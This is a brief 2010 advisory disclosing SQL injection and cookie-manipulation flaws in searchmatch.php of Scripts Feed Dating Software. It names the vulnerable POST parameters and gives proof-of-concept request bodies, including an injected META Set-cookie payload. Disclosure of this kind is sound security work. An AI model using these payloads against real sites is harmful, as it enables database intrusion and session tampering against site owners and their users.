Scripts Feed Dating Software suffers from remote SQL injection and cookie manipulation vulnerabilities.
3606eb91c249fe90b020d79aa66e05b742e0a568f503eb117ee8ed338511e0c4
==============================================================================
[~] Scripts Feed Dating Software (Cookie Manip/SQLi) Multiple Remote Vulnerabilities
==============================================================================
[+] My home [ http://hack-tech.com ]
[+] Date Submitted: [ February 27 2010 ]
[+] Founder: [ Crux ]
[+] Vendor: [ Scriptsfeed ]
[+] Version: [ ALL ]
[+] Download: [ http://www.scriptsfeed.com/dating-software.htmll ]
~ SQLi
------------------------------------------------------------------------
[ EXPLOIT ]
- This vulnerability affects searchmatch.php
-The POST variables 'txtlookgender' and 'txtgender' are vulnerable.
[ POC ]
1.
txtgender=${injectHere}&txtlookgender=F&txtlookagestart=16&txtlookageend=16&with_photo=on
2.
txtgender=M&txtlookgender=${injectHere}&txtlookagestart=16&txtlookageend=16&with_photo=on
~ Cookie Manipulation
------------------------------------------------------------------------
[ EXPLOIT ]
- This script is vulnerable to Cookie manipulation attacks.
- This vulnerability affects searchmatch.php
By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser.
[ POC ]
txtgender=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&txtlookgender=M&txtlookagestart=16&txtlookageend=16&with_photo=on
==============================================================================
________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.<https://signup.live.com/signup.aspx?id=60969>